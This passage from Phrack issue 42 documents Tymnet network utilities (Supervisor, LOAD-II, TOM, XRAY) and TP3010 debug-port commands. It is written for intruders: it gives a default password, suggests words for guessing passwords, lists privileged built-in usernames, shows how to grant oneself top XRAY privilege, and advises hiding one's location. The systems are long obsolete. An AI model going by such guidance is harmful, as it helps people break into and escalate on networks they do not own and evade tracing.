- SPY 10 Displays last 32 executions of selected commands.
-
- NETWORK SUPERVISOR CMDS:
- Command Lic. Lvl Description
- ------- -------- -----------
- AWAKE 01 Wakes a sleeping Supervisor. (Only one Supervisor is
- active at one time, however there can be supervisors
- 'sleeping'.)
- CLASS 01 Causes Supervisor to read Netval class and group
- definitions.
- DF s 01 Increases Supervisor's drowsiness factor by 's' seconds.
- ETIME 01 Sets time known to Supervisor.
- FREEZE 01 Removes Supervisor from network.
- PSWD 01 Displays password cipher in hex.
- SLEEP 01 Puts active Supervisor to sleep.
- THAW 01 Initializing frozen Supervisor.
- TWAKE 01 Wakes sleeping Supervisor, automatically puts active
- Supervisor to sleep and executes a CSTAT command.
-
- USER UTILITY CMDS:
- Command Lic. Lvl Description
- ------- -------- -----------
- ENTER 01 Adds/deletes/modifies Probe usernames.
- HANG x 01 Logs off user with job label 'x'.
- LIST 01 Displays Probe usernames.
- ULOGA 20 Enters user-generated alphabetic message in msg log.
- ULOGH 20 Enters user-generated hex message in msg log.
-
- SYSTEM MAINTENANCE / DISASTER RECOVERY CMDS:
- Command Lic. Lvl Description
- ------- -------- -----------
- DCENT n1 n2 02 Allows Tymnet support temporary, controlled access
- to a private network. (Useful)
- DCREAD 02 Reads current value of password cipher associated
- with DCENT username.
- FTIME +/- s 02 Corrects the 'Super Clock' by adding (+) or
- subtracting (-) 's' seconds from it.
- INITA 02 Initializes accounting file to all zeros.
- INITL 02 Initializes log to all zeros.
-
-
- NOTE: Each PROBE is a separate entity with its own files. For example,
- if you shut lines in the PROBE on the active Supervisor, this will
- NOT be known to the sleeping PROBE. If another Supervisor takes
- over the network, it will not consider the link to be shut.
- Likewise, PROBE password changes are made only to one PROBE at a
- time. To change your password everywhere, you must do a CHANGE in
- each probe.
-
- LOAD-II
- -------
-
- LOAD-II is probably one of the LEAST known of Tymnet's utilities.
- LOAD-II is used to load or dump a binary image of executable code for a
- node or slot. The load/dump operation can be used for the ENTIRE engine,
- or a specific slot.
-
- Upon reaching the command prompt you should enter:
-
- R LOADII <cr>
-
- This will initiate an interactive session between you and the LOAD-II
- load/dumping process. The system will go through the following procedure:
-
- TYMNET OUTPUT YOUR INPUT WHAT THIS MEANS TO YOU
- ------------- ---------- ----------------------
-
- Enter Function: G 'G' Simply means identify a gateway
- Enter Gateway Host: #### This is the 4 digit identifier for hosts
- on the network. I know that 2999 is for
- 'MIAMI'.
- Password: LOAD This is the default password for LOAD-II.
- Function: C 'C' for crash table dump, OR
- D 'D' to dump an entire engines contents, OR
- L 'L' to load an entire engines contents, OR
- S 'S' to load a slot, or
- U 'U' to dump a slot.
- Neighbor Node: #### Selects neighbor node number.
- Neigh. Kern. Host#: ### This 3-digit code is derived by adding the
- first two digits of the node number and
- appending the last two digits to that sum.
- Line # to Load From: ## Use the line number coming off the
- neighbor node, NOT the node that is DOWN.
- Object File Name: File used to load/dump node or slot from/to.
- EXIT EXI Send program to end of job.
-
-
- TOM - TYMCOM Operations Manager
- -------------------------------
-
- TOM is utility which runs under TYMCOM. Quickly, TYMCOM is an interface
- program for the host computer which imitates multiple terminals. Quoting
- from Tymnet, "TYMCOM has multiple async lines running to the
- front-end processor of the host." So in other words, TYMCOM has a
- bunch of lines tied into the engine's front-end, allowing a boatload of
- jobs/users to access it.
-
- TOM is primarily used with TYMCOM dialup ports. It is used to DOWN and
- then UP hung ports. This type of situation may occur after a host crash
- where users are getting a 'Host Not Available' error message. TOM can also
- be used to put messages on TYMCOM in order to alert users to problems or
- when scheduled maintenance will occur on various hosts/ports. To login
- type:
-
- ##TOM##:xxxx
-
- Where 'xxxx' is the appropriate host number you wish to 'work' on. After
- proper hostname is given, you will then be prompted for a password. As I
- have none of these to give, play on 3-5 character combinations of the
- words: TYMCOM, TOM, HIF, OPMNGR.
-
- Command Description
- ------- -----------
- GRAB TOMxxxx This should be the FIRST thing you do when down/upping
- a host. Gets license for up or down host, then prompts for
- password of host. Where 'xxxx' is the host number. You
- must have privileged status to use.
-
- CHANGE xxxx Change a host number to 'xxxx'.
-
- DIAGNOSTICS Turns the diagnostic messages off or on.(Toggle)
- DOWN P xx Take DOWN port number 'xx', or
- H xxxx Take DOWN host number 'xxxx'.
-
- ENQUIRE Lists information about the node and slow where TYMCOM is
- running.
- EXIT Logout.
-
- MESSAGE Sets text to be output to the terminal when a user logs in.
-
- SHUT H xxxx Disallow new logins to a specified host = 'xxxx', or
- P xx Disallow new logins to a specified port = 'xx'.
- SPEED xxxx Specifies the baud rate at which a port will communicate.
- STAT P xx-yy Shows status of port numbers 'xx' through 'yy'. Either
- one or a number of ports may be specified.
-
- TIME Displays the current time.
- TO x message Sends 'message' to specified user number 'x'.
-
- UP P xx Bring UP port number 'xx', or
- H xxxx Bring UP host number 'xxxx'.
-
- WHO Lists user numbers of all users currently logged into TOM.
-
-
- XRAY
- ----
-
- XRAY is another one of the very well known commands. XRAY is a program
- which sits within node code and waits for use. Its used to gain
- information about a specific node's configuration and its current status in
- the network. It can be used to determine the probable reason for a crash
- or line outage in order to isolate bottlenecks or track down network
- anomalies.
-
- XRAY user licenses are all assigned a logon priority. If every XRAY
- port on a node are in use, and a higher priority XRAY username logs in,
- the lowest priority username will be logged out.
-
- License Description
- ------- -----------
- 2 Permits the writing and running of disruptive node tests.
- 1 Permits the running of non-disruptive node tests.
- 0 Permits view only commands.
-
- The following list is a compilation of some hardcoded 'good-guys'.
-
- LICENSE LEVEL PRIORITY GOOD GUY USERNAME ACTIVE/PASSIVE NETWORK IMPACT
- ============= ======== ================= ============== ==============
- 2 98 XMNGR Active MAJOR
- 2 98 ISISTECX Active MAJOR
-
- 2 97 XNSSC Active MAJOR
-
- 1 50 TNSCMX Active Minor
- 1 50 TNSUKMX Active Minor
-
- 1 40 XSOFT Active Minor
- 1 40 XEXP Active Minor
- 1 40 XCOMM Active Minor
- 1 40 XSERV1 Active Minor
-
- 0 50 XRTECH Passive
-
- 0 30 XTECH Passive
- 0 30 XOPPS Passive
- 0 30 XSERV Passive
- 0 0 XRAY Passive
-
- What follows is a VERY brief command summary.
-
- Command Description
- ------- -----------
- CD Displays current auto/display mode for CRYPTO messages.
- CD Y|N Turns ON/OFF automatic display of CRYPTO messages.
- CL n Display the last 'n' CRYPTO messages.
- CRTL Z Logout.
-
- BT Causes the SOLO machine to go into boot. Audited command.
-
- DB Used to build and measure link delay circuits between
- nodes. The DB command prompts for a node list. IE-
- NODE LIST: <node #1 node#2 ... node#x>
- DD Displays link measurement data for circuit built by the
- DB command. Verifies that the circuit has been built.
- DE Used to terminate the DB command.
-
- HT Puts the node code into a STOP state. This command shows
- up in audit logs.
-
- KD n Display link descriptor parameters where 'n' is the
- neighbor number.
- KS n Display link performance statistics (link delay, packet-
- making, bandwidth utilization, etc.)
-
- ND Displays information about the configuration of a node
- and its neighbors.
- NS option Displays parameters for estimating node work load. Options:
- -EXCT is the current load factor or execute count. A count
- of less than 60 means the load is heavy.
- -EXLW is the lowest EXCT value computed since startup.
- -EXHW is the highest EXCT value computed.
- SN Restarts the node, command audited.
- ------------------------------------------------------------------------------
-
- I hope this file gave you a better understanding of the Tymnet network.
- While a lot of the commands make sense only if you've had prior Tymnet
- experience, I hope my summaries of each tool gave you a little better
- understanding of the network. I am available for questions/comments/gripes
- on IRC, or I can be reached via Internet mail at:
-
- pfalken@mindvox.phantom.com
-
- Thanks goes out to an anonymous hippy for providing the extra nudge I needed
- to sit down and write this phile. NO thanks goes out to my lousy ex-roommates
- who kicked me out in the middle of this article. Their day is approaching.
-
- Be careful everyone...and remember, if you have to explore the
- mysterious fone/computer networks, do it from someone else's house.
-
- - Professor Falken
- = Legion of Doom!
-
-
- <EOF-93> [Written with consent and cooperation of the Greys]
-
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 6 of 14
-
-
- A User's Guide to XRAY
-
- By N.O.D.
-
-
- This file was made possible by a grant from a local
- McDonnell Douglas Field Service Office quite some 'tyme'
- ago. This was originally written about version 4, although
- we are pretty sure that BT has now souped things up to version 6.
- Everything still seems the same with the exception of a few
- commands, one of which we will point out in particular.
-
- Any comments/corrections/additions/updates or subpoenas
- can be relayed to us through this magazine.
-
- XRAY is a monitoring utility that gives the user a real-time
- window into a Tymnet-II node. Used in tandem with other
- utilities, XRAY can be a very powerful tool in monitoring network
- activity.
-
- In this file we will discuss key features of XRAY and give command
- formats for several commands. Some commands are omitted from this
- file since they can only be used from dedicated terminals. Several
- others are likewise omitted since they deal with the utilization of
- XRAY in network configuration and debugging the actual node code, and
- would probably be more damaging than useful, and commands to reset
- circuits and ports are similarly missing.
-
-
- ACCESS
-
- The most obvious way to access XRAY is to find the username/password
- pair that either corresponds to the host number of an XRAY port, or
- is otherwise in the goodguy list of a particular node.
-
- XRAY can also be accessed through the DDT utility by typing
-
- ?STAT
-
- Either will respond with the following
-
- **X-RAY** NODE: XXX HOST: ZZZ TIME: DD:HH:MM:SS
-
- If all ports are currently in use the user will only be allowed access
- if his/her is of greater precedence in the goodguy list than that of
- someone previously online. In such a case, that user will be forcibly
- logged out and will receive the following message:
-
- "xray slot overridden"
-
- Otherwise the user will see:
-
- "out of xray slots"
-
- XRAY users are limited in their power by the associated "licence" level
- given them in the XRAY goodguy list. The levels are:
-
- 0 - normal
- 1 - privileged
- 2 - super-privileged
-
-
- There are several user names associated with the
- XRAY utility. These exist on almost any network utilizing
- the Tymnet-II style networking platform.
-
- PRIORITY USERNAME
-
- 2 XMNGR
- 2 ISISTECX
- 2 XNSSC
- 1 TNSCMX
- 1 TNSUKMX
- 1 XSOFT
- 1 XEXP
- 1 XCOMM
- 1 XSERV1
- 0 XRTECH
- 0 XTECH
- 0 XOPPS
- 0 XSERV
- 0 XRAY
-
-
-
- COMMANDS with parameters in <brackets>
-
- HE Help
-
- Use this command to display the commands available for that
- particular node.
-
- GP Get power <security string>
-
- This command allows the user to move up to the maximum security
- level allowed by his username, as specified in the good guy
- list.
-
- XG Display and/or modify XRAY goodguy list <entry number> <P/M>
-
- This command without parameters will display the XRAY goodguy
- list. When added with an entry number and 'P' (purge) or
- 'M' (modify), the user can edit the contents of the table.
- The XGI command will allow the user to enter a new entry
- into the list. Any use of XG or XGI to alter the list is
- a super-privileged command and is audited.
-
- >XG
-
- XRAY GOODGUY LIST
-
- NO. PRIV OVER NAME
- ---- ---- ---- ----
- 0001 0002 00FF TIIDEV
- 0002 0001 0030 RANDOMUSER
- 0003 0000 0000 XRAY
-
- >XGI
-
- ENTER UP TO 12 CHARACTERS OF USERNAME
-
- NOD
-
- ENTER NEW PRIVILEGE AND OVERRIDE - 2,FF
-
- >XG
-
- XRAY GOODGUY LIST
-
- NO. PRIV OVER NAME
- ---- ---- ---- ----
- 0001 0002 00FF TIIDEV
- 0002 0001 0030 RANDOMUSER
- 0003 0000 0000 XRAY
- 0004 0002 00FF NOD
-
- BG Display and/or modify Bad Guy List <node number> <R/I>
-
- This command when entered without any parameters displays the
- "bad guy" list. When used with a node number and 'R' it will remove
- that node from the list, and 'I' will included. The 'R' and 'I'
- features are privileged commands and usage is noted in audit trails.
-
- >BG
-
- 2000 701 1012
-
- >BG 2022 I
-
- 2022 2000 701 1012
-
- HS Display host information
-
-
-
- ND Display node descriptor
-
- This command displays information about the node and its network
- links.
-
- NS Display node statistics
-
- This command displays various statistics about the node including
- time differentiations in packet loops, which can then be used to
- determine the current job load on that particular node.
-
- KD Display link descriptor <linked node>
-
- This command displays the values of the link to the node specified.
- This is displayed with columns relating to type of node (TP), speed
- of the link (SP), number of channels on the link (NCHN), etc..
-
- KS Display link statistics <up to 8 node numbers>
-
- This command provides a report on various factors on the integrity
- of the link to the given node(s), such as bandwidth usage, packet
- overhead, characters/second transmitted, delays in milliseconds, etc.
-
- BZ "Zap" link to node <node number>
-
- This command will cause the link to the specified node to be
- reset. This command is privileged and is audited. If the node
- "zapped" is not currently linked a "??" error message will be
- displayed.
-
- TL Set/Reset trace on link <node number>
- TN Set/Reset trace on line <node number>
- TM Display trace events <B(ackground) / F(oreground)>
-
- These commands are used to display activity between two active
- nodes.
-
-
- AC Display active channels <starting channel> <range of channels>
-
- This command will display all active channel numbers for the given
- range starting at the given channel number. Range is in hex.
-
- QC Query channel status <channel number>
-
- This command displays information about the given channel,
- including throughput speed, source and output buffer size and
- address location.
-
-
- TC Enable/disable data trace on channel <channel number> <0/1>
-
- This command with no arguments displays the channels
- that are being diagnosed by the trace. The command with
- a channel number and a '1' will enable data trace for that
- channel, and a '0' will disable trace on that channel. Enabling
- or disabling trace is a privileged command.
-
- TD Display channel trace data in hex <count> <I/O>
- TE Display channel trace data in hex including escapes <count> <I/O>
- TA Display channel trace data as ASCII <count> <I/O>
-
- With these commands trace data is displayed for a specified
- time count. A prefixed 'I' or 'O' will show input or output
- data. The default is both.
-
- >ta 5
-
- I/O CHN TIME
- OUT 0040 ECC5 \86\86\0F\00\8A\80h\80\8CS\83valinfo;
- IN 0040 EC87 \00\09\86\86\0D\08\00\00h
- OUT 0040 0F67 \86\86\0E\00\880\8D
- IN 0040 1029 \00,\86\86\09\86\00\00\90\1B\19\80 \06\86\00\00h
- \15\1B\08J\04\0B\04\0F\04=\0DR\80JS\80\80
- \8CVALINFO\8D
- OUT 0040 102F \86\86\14\89p\90\1B\19\86\86\14\89j\18\15\13
-
- **Note: Although this will allow one to follow the network connections
- on specific channels, password data is filtered out. As you
- can see from the above example, usernames are not. Many
- usernames do not have passwords, as you all know. **
-
- On more recent versions of XRAY a similar command "DR" performs a
- similar function to the trace commands, but shows both hex and
- ascii of the data in memory registers of the node.
-
- >DR
-
- I NOS 0001 A0 *
- I SND 0001 A1 * !
- I DTA 4920 616D 2061 6E20 6964 696F 7420 6265 *I am an idiot be*
- 0002 9D63 6175 7365 2049 206C 6566 7420 * cause I left *
- 6D79 7365 6C66 206C 6F67 6765 6420 696E *myself logged in*
- 2061 6E64 2077 656E 7420 686F 6D65 2E0D * and went home. *
- 6F70 7573 2520 0D0A 0D0A 0D0A 0D0A 0D0A *opus% *
-
- BS Display bufferlet use statistics
-
- This command shows the current and past usage of the memory
- allocated to data buffering. This shows total usage, total peak
- usage, and available buffer size.
-
- RB Read buffer <buffer index>
-
- This command displays the entire contents of the given buffer.
- This is a privileged command and its use is not primarily for user
- circuits. Primarily.
-
- >RB 69
-
- 50 61 72 74 79 20 6F 6E 20 64 75 64 65 21 21 21
-
- WB Write buffer <buffer index>
-
- This command writes up to seven bytes into the specified buffer.
- The buffer must greater than 4. This is also a privileged command.
-
- CD Set/reset CRYPTO auto display mode <Y/N>
- CL Display CRYPTO log <number of minutes>
- CM Display CRYPTO messages by type
- SM Enable/Disable CRYPTO messages by type
-
- CRYPTO messages are informational messages about the activity of
- the node. Up to 256 such entries are stored in a circular buffer
- to record this activity. You can turn on automatic reporting
- of these messages with the CD command prefixed with a 'Y' for
- on and 'N' for off. Certain message types that become bothersome
- can be disabled with the SM command and the message type.
-
- DB Begin delay measurement
- DD Display delay measurement statistics
- DE Terminate delay measurement
- DL Begin data loopback circuit
-
- These commands are used to build circuits for testing the speed and
- integrity of data flow between two nodes. The DL command is
- super privileged and only one such circuit can be built on
- a node at a given time. The data traffic generated by the DL is for
- diagnostic use only and can be monitored by viewing node and link
- statistics.
-
- PM Measure performance on a channel <channel number>
-
- This command measures the performance of a given channel by
- inserting a timing sequence into the packet stream. Once it has
- reached the given channel it is returned and a value corresponding
- to the total time elapsed in milliseconds is displayed. If the
- channel is not active, or no response is returned in 8 seconds the
- message "BAD CHANNEL OR TIMEOUT" is displayed.
-
- LE Set local echo mode
- RE Set remote echo mode
-
- One would use the set local echo command if the XRAY terminal
- is not echoing commands typed by the user. By default, XRAY does
- not echo output.
-
-
- SUMMARY
-
- XRAY is pretty confusing. Be careful with what you are doing
- since you are essentially prodding around in the memory of the
- node. Think of it in terms of using a utility to poke and prod
- the memory of your own computer. Think of how disastrous a
- command written to the wrong portion of memory can be. Don't
- do anything stupid, or you might bring down a whole network,
- or at minimum lose your access.
-
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 7 of 14
-
- USEFUL COMMANDS FOR THE TP3010 DEBUG PORT
-
- BY G. TENET
-
-
- ALL OF THE COMMANDS LISTED BELOW, INDICATE A LENGTH IN ALL THE READ
- COMMANDS. THE LENGTH OF THE READ COMMANDS MAY VARY DUE TO
- CONFIGURATION OPTIONS AND SOFTWARE VERSION.
-
- 1) L7FE,L,A,R200
-
- THIS COMMAND STRING WILL LOAD '7FE' INTO THE MEMORY POINTER
- REGISTER THEN LOAD THE CONTENT OF '7FE' AND '7FF' INTO THE MEMORY
- POINTER REGISTER. THE 'A' THEN INCREMENTS THE CONTENTS OF THE MEMORY
- POINTER REGISTER. THE 'R200' COMMAND THEN READS 200 BYTES BEGINNING
- AT THE LOCATION SPECIFIED BY THE MEMORY POINTER REGISTER.
- THIS AREA IS USED FOR STORING THE LOADED CONFIGURATION. DUE TO THE
- VARIABLE NATURE OF THE CONFIGURATION RECORDS, THE READ COMMAND MAY HAVE
- TO BE MODIFIED DEPENDANT ON THE NUMBER OF LINES DEFINED, THE TYPE OF LINES
- DEFINED (X780,3270) AND THE TYPE OF SOFTWARE LOADED (4.2X OR 5.0X).
-
-
- 2) LC4,R3,LCC,R3 (4.2X SOFTWARE)
- L124,R3,L131,R3 (5.0X SOFTWARE)
-
- THIS COMMAND STRING WILL DISPLAY THE BUFFER MANAGER CONTROL BLOCK AREA
- WHICH HAS BUFFER COUNTS WHICH MAY SUGGEST POSSIBLE PROBLEMS.
-
-
- 3) L32C,R (4.2X SOFTWARE)
- L29C,R (5.0X SOFTWARE)
-
- THIS COMMAND STRING WILL DISPLAY THE NUMBER OF ACTIVE VC'S IN THE
- TP3 AT THAT MOMENT.
-
- IF THIS COMMAND IS USED VIA THE LOCAL CONSOLE, THE VC COUNT WILL NOT
- INCLUDE THE USER CONNECTION BECAUSE THERE WILL BE NO VC ON THE X.25 LINE
- FOR THE LOCAL CONSOLE.
-
- 4) L70,R60
-
- THIS COMMAND STRING WILL DISPLAY THE LCB (LINE CONTROL BLOCK) POINTER
- FOR THE CONFIGURED LINES.
-
- THE ORDER THAT THE LCB POINTERS ARE ENTERED ARE: CONSOLE LCB, X.25 LCB,
- LINE 1, LINE 2, LINE 3...LINE27. ANY ZERO ENTRY IS AN UNCONFIGURED
- LINE EACH LINE ENTRY IS TWO BYTES LONG.
-
-
- 5) L300,L,R20 (4.2X SOFTWARE)
- L270,L,R20 (5.0X SOFTWARE)
-
- THIS COMMAND STRING WILL DISPLAY THE LCN VECTOR TABLE. THE ENTRIES ARE
- FOR EACH ACTIVE LCN BEGINNING WITH LCN 0 THRU THE HIGHEST CONFIGURED
- LCN. A 0000 ENTRY FOR AN LCN WILL INDICATE THAT THE LCN IS NOT ACTIVE.
- A NON ZERO ENTRY WILL POINT TO THE DCB (DEVICE CONTROL BLOCK) OF THE
- ASSOCIATED LINE/DEVICE.
-
- 6) L1F1,L,R20 (4.2X SOFTWARE ONLY)
-
- THIS COMMAND STRING WILL DISPLAY THE PROTOCOL ID TABLE FOR THE
- CONFIGURED/SUPPORTED PROTOCOLS. THE FORMAT OF THE OUTPUT
- IS:
- 999999999999...
- -- ----
- ! -- ! ----
- ! ! ! !...............POINTER TO THE SERVER TABLE *****
- ! ! !...................POINTER TO THE PROTOCOL SERVICE ROUTINE
- ! !......................PROTOCOL ID NUMBER
- ! 01 =ITI (RITI AND LITI)
- ! 4B =X780
- ! 47 =NAP 3270
- ! 09 =DEBUG
- !........................NUMBER OF ENTRIES IN THIS TABLE
-
-
- 7) L(ADDRESS OF THE SERVER TABLE),R20
-
- THE ADDRESS OF THE SERVER TABLE IS FOUND IN #6 (ABOVE)
- THIS COMMAND WILL DISPLAY THE SERVER TABLE IN THE FORMAT:
-
- 99999999...
- -- ----
- ! -- !................ THIS IS THE ADDRESS OF THE FIRST FREE DCB
- ! ! IN THE FREE DCB LIST. IF 0000 THEN THERE ARE
- ! ! NO FREE DCB'S FOR THIS SERVER AND PROTOCOL.
- ! !.....................SERVER NUMBER
- !.......................NUMBER OF ENTRIES IN THIS TABLE
-
-
- THE POINTER IN THIS TABLE , IF PRESENT, WILL POINT TO THE NEXT AVAILABLE
- DCB. WITHIN THE DCB, THERE IS A POINTER AT DISPLACEMENT 18 AND 19 WHICH
- WILL POINT TO THE NEXT FREE DCB. THE LAST FREE DCB WILL HAVE A
- POINTER OF 0000.
-
- THE FOLLOWING COMMANDS ARE USED WITHIN THE TP3 DEBUG PORT TO
- PERFORM THE INDICATED ACTIONS. ONLY THE TP3325 WILL SUPPORT THE
- [# LPU NUMBER] OPTIONS. THE USE OF THE [# LPU NUMBER] OPTION IS ONLY
- REQUIRED IF YOU WISH TO ADDRESS A DIFFERENT LPU NUMBER; EXCEPT FOR THE
- 'S' COMMAND WITH WHICH THE LPU MUST BE DEFINED.
-
- A SPACE CHARACTER MAY BE INCLUDED IN THE COMMAND AND THE COMMANDS
- MAY BE STACKED (EXAMPLE: L7FE ,L,A,R5,L#2,L 7FE,L,A,R5,L#3 7FE,L,A,R 5).
-
- THE TP3325 COMMANDS THAT DO NOT USE THE 'LPU' PARAMETER USE THE
- LAST ASSIGNED LPU NUMBER. (EXAMPLE: L#27FE,R2,L#17FE,R4)
- THE FIRST LOAD COMMAND ADDRESSES LPU 2 AND THE NEXT LOAD COMMAND ADDRESSES
- LPU 1. THE READ OF TWO BYTES IS READING FROM LPU 2 AND THE READ OF FOUR
- BYTES IS READING FROM LPU 1.
-
- A VALUE
- INCREMENTS THE MEMORY ADDRESS POINTER.
- (EXAMPLE: A5 OR AFFE2 OR A#2EF)
-
- B VALUE
- USED TO ENTER OR EXIT BINARY MODE.
- (EXAMPLE: B01 OR B00)
-
- C [# LPU NUMBER] VALUE
- USED TO WARM OR COLD START A TP3325 LPU
- (EXAMPLE: C00 OR C#300)
- OR
- USED TO WARM OR COLD START OTHER TP3.
- (EXAMPLE: C01 OR C#201)
-
- D VALUE
- USED TO DECREMENT THE MEMORY POINTER.
- (EXAMPLE: D18 OR DFFE5 OR D#4IFF)
-
- E STRING
- USED TO CHECK FOR A EQUAL COMPARE OF MEMORY DATA.
- (EXAMPLE: E00 OR E0F0304 OR E#20000)
-
- F STRING
- USED TO FIND THE FIRST OCCURRENCE OF A STRING.
- (EXAMPLE: F0F0304 OR F08080202 OR F#308080404)
-
- G [# LPU NUMBER] VALUE
- USED TO FIND THE ADDRESS OF A CONFIGURATION FILE IN
- MEMORY. THE LPU DEFINITION IN THE COMMAND DOES
- NOT CHANGE THE LPU ASSIGNMENT IN THE DEBUG PORT.
- (EXAMPLE: GFE OR G01 OR G#301)
-
- I [# LPU NUMBER]
- USED TO OBTAIN A LIST OF THE CONFIGURED LINE TYPES.
- (EXAMPLE: I OR I#3)
-
- K [# LPU NUMBER] [14 DIGIT ADDRESS]
- USED TO OBTAIN THE LCB, ADDRESS TABLE POINTERS AND
- LINE NUMBER ASSOCIATED WITH THE ADDRESS.
- (EXAMPLE: K31102120012301 OR K#2 311021250212)
-
- N STRING
- USED TO CHECK FOR AN NON EQUAL COMPARISON.
- (EXAMPLE: N0F0304 OR N08080202 OR N#1 0F)
-
- P [# LPU NUMBER] PORT NUMBER
- USED TO READ THE CONTENTS OF A SPECIFIC PORT REGISTER.
- (EXAMPLE: P45 OR P21 OR P#4 21)
-
- R VALUE
- USED TO READ MEMORY DATA. THE QUANTITY IS INDICATED
- BY THE 'VALUE'.
- (EXAMPLE: R18 OR R200)
-
- S [# LPU NUMBER] LINE NUMBER
- USED TO OBTAIN DATA SET SIGNALS FOR THE DEFINED LINE
- NUMBER.
- (EXAMPLE: S1 OR S#23 OR S)
-
- T (TP3325 ONLY)
-
- W STRING
- USED TO WRITE DATA INTO MEMORY.
- (EXAMPLE: W0E0304 OR W08080707)
-
- X [# LPU NUMBER]
- USED TO DISPLAY THE DIFFERENCE BETWEEN THE STORED
- CHECKSUM AND A CALCULATED CHECK SUM OF THE
- OPERATING SOFTWARE. THE LPU DEFINITION DOES
- NOT CHANGE THE LPU ASSIGNMENT IN THE DEBUG PORT.
- (EXAMPLE: X OR X#2)
-
- Y (TP3325 ONLY)
- RETURNS NCC LOAD ADDRESS FROM EPROM
-
- Z (TP3325 ONLY)
- CRASHES APB AND XPB. MAY HANG APB IF THE X.25
- INTERFACE DOES NOT RESET.
-
- $ PORT A -- ENABLE AUTOCONNECT
- M -- DISABLE AUTOCONNECT
- B -- BUSY
- R -- RESET
- C -- CLEAR
-
- HARDWARE COMMANDS FOR THE TP3000
-
- 'P' COMMAND DISPLAYS THE STATUS OF A SPECIFIED PERIPHERAL INTERFACE
- DEVICE FOR THE CPU. FOLLOWING IS A LIST OF SOME OF THE MORE USEFUL ADDRESSES
- WHICH CAN BE BENEFICIAL IF TRYING TO RESEARCH A PROBLEM.
- THIS COMMAND IS A READ TO THE SPECIFIED DEVICE. DEPENDANT ON THE DEVICE
- BEING READ (THE ADDRESS), THE TP MAY CRASH.
-
- COMMAND INTERPRETATION
- ======= ==============
-
- TP3010
- ------
- P45 READ CONSOLE READ REGISTER
- (BIT 2 THRU 6 SHOW THE POSITION OF
- THE FRONT PANEL ROTARY SWITCH)
- BIT 0 = NOT TIMEOUT STATUS (SEE P47)
- BIT 1 = NOT PBRST STATE (SEE P47)
- BIT 2 = NOT RESTART
- BIT 3 = NOT MEMORY SAVE
- BIT 4 = NOT TAPE LOAD
- BIT 5 = NOT PROGRAM SAVE
- BIT 6 = NOT DIAGNOSTICS
- BIT 7 = NOT SYSTEM GOOD
- IF BIT 6 THRU BIT 2 ARE ALL SET (EQUAL TO 1)
- THEN THE FRONT PANEL SWITCH IS IN
- THE X.25 LOAD POSITION.
- P47 THIS COMMAND WILL CAUSE THE FRONT PANEL
- ALARM TO SOUND.
-
- P4D,P4D,P4D,P4D,P4D,P4D,P4D THE LAST RESPONSE WILL PROVIDE THE
- DOWN LINE LOAD EPROM REV. LEVEL
- FOR THE TP3010.
- EXAMPLE 43 = 'C' LEVEL
- TP3005
- ------
- P23 BIT 1 = 0 CONFIG MODE
- 1 RUN MODE
-
- 4.2X 5.XX COMMENTS
- ====== ====== ===========================================
-
- 70 70 LCB VECTOR TABLE
-
- 2 BYTES FOR EACH LINE IN THE TP. IF LINE IS
- NOT DEFINED , THEN ENTRY IS 0000. IF LINE
- IS DEFINED, THEN ADDRESS POINTS TO THE
- LCB (LINE CONTROL BLOCK)
-
- C0 120 BM CONTROL BLOCK
- C4 124 # CONTROL BUFFERS INITIALIZED
- C5 125 # CONTROL BUFFERS FREE
- C6 126 LOWEST # CONTROL BUFFERS (00 IS NONE LEFT)
- 12B POINTER TO THE CONTROL BUFFERS
- CC 131 # BLOCK BUFFERS INITIALIZED
- CD 132 # BLOCK BUFFERS FREE
- CE 133 LOWEST # BLOCK BUFFERS REACHED (00 IS NONE
- LEFT)
- 138 POINTER TO BLOCK BUFFERS
- 1F1 POINTER TO PROTOCOL ID TABLE
-
- 270 1F0 X.25 LCB
- 27E 27E # FRAMES DISCARDED
- 27F 27F # CRC ERRORS
- 280 280 # REJECTS SENT
- 281 281 # REJECTS RECEIVED
- 282 282 # T1 TIME OUTS
- 283 283 # COMMAND REJECTS SENT
- 284 284 # COMMAND REJECTS RECEIVED
- 285 285 # DISCONNECTS SENT
- 286 286 # DISCONNECTS RECEIVED
- 287 287 # SET MODE SENT
- 288 288 # SET MODE RECEIVED
- 289 289 # FRAME OVERFLOW RECEIVED
- 28A 28A # I FRAMES SENT
- 28B 28B # I FRAMES RECEIVED
- 2B0 230 DMA LCB
-
- 300 270 LCN VECTOR TABLE
-
- 29B MAX. # LCN'S
- 32C 29C # OF ACTIVE LCN'S
-
- 7FE 7FE POINTER TO THE END OF THE OPERATING
- SYSTEM. THE NEXT BYTE IS THE BEGINNING
- CONFIGURATION TABLES.
-
- 159 E9 TIME OF DAY CLOCK
- 159 E9 1/10 SECONDS
- 15A EA SECONDS
- 15B EB MIN.
- 15C EC HOURS
- 15D ED DAYS
- 15E EE DAYS
-
- DCB + 3 XX PACKET REC. STATUS BYTE#1
- 00 = READY
- 01 = DTE WAITING
- 02 = DCE WAITING
- 04 = DATA TRANSFER
- 08 = DTE CLEAR REQUEST SENT
- 10 = DCE CLEAR INDICATION
- 20 = DTE RESTART REQUEST
- 40 = DTE RESET REQUEST
- 80 = DCE RESET INDICATION
- DCB +18 XX POINTER TO NEXT FREE DCB
- VALID ONLY IF THIS IS A FREE DCB
-
- ITI SPECIFIC LCB INFORMATION
-
- LCB+27 PHYSICAL STATUS
- X'00' LINE DOWN/INACTIVE
- X'01' LINE HAS BEEN INACTIVATED
- X'02' LINE IS 'BUSY OUT'
- X'04' LINE IS BEING ACTIVATED
- X'08' LINE IS ACTIVE
- X'10' LINE IS BEING INACTIVATED
-
- LCB+28 TDT2 COMMAND BYTE
- BIT 0 = 1 BUSY LINE
- BIT 1 = 1 CLEAR LINE
- BIT 2 = 1 RESET LINE
- BIT 3 - 7 NOT USED
-
- LCB+5C # BUFFERS ALLOCATED TO THIS LINE
- LCB+5D DRIVER ERROR COUNTER
- LCB+5E NO BUFFER ERROR COUNTER
- LCB+5F FLOW CONTROL ERROR COUNTER
- LCB+60 PARITY ERROR COUNTER
- LCB+61 OVER-RUN ERROR COUNTER
- LCB+62 FRAMING ERROR COUNTER
- LCB+74 BREAK TIMER
- LCB+75 RING-OUT TIMER
- LCB+76 RING-OUT COUNTER
-
- DSP 3270 LCB SPECIFIC INFORMATION
-
- LCB+4F CURRENT NO. SYNC PAIRS INSERTIONS
- LCB+50 CURRENT NO. OF ERROR RETRIES
- LCB+51 CURRENT NO. OF NAK RETRIES
- LCB+52 CURRENT NO. OF ENQ RETRIES
